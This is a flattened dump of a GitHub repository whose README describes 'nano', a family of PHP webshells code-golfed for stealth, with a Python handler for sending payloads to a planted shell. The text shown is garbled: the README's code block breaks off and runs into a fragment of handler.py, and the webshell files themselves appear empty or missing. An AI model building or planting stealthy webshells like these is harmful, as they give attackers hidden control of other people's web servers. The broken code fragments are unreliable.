Repository: s0md3v/nano Branch: master Commit: a2c47363d98c Files: 6 Total size: 3.9 KB Directory structure: gitextract_5nlqef24/ ├── .gitattributes ├── .whitesource ├── README.md ├── handler.py ├── nano.php └── ninja.php ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ * linguist-language=PHP ================================================ FILE: .whitesource ================================================ { "generalSettings": { "shouldScanRepo": true }, "checkRunSettings": { "vulnerableCheckRunConclusionLevel": "failure" } } ================================================ FILE: README.md ================================================ # nano Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.\ Put it on watch maybe, I will continue to upload more webshells in here. ### Nano ```php %s ' % (green, end)) requester(url, payload, shell) ================================================ FILE: nano.php ================================================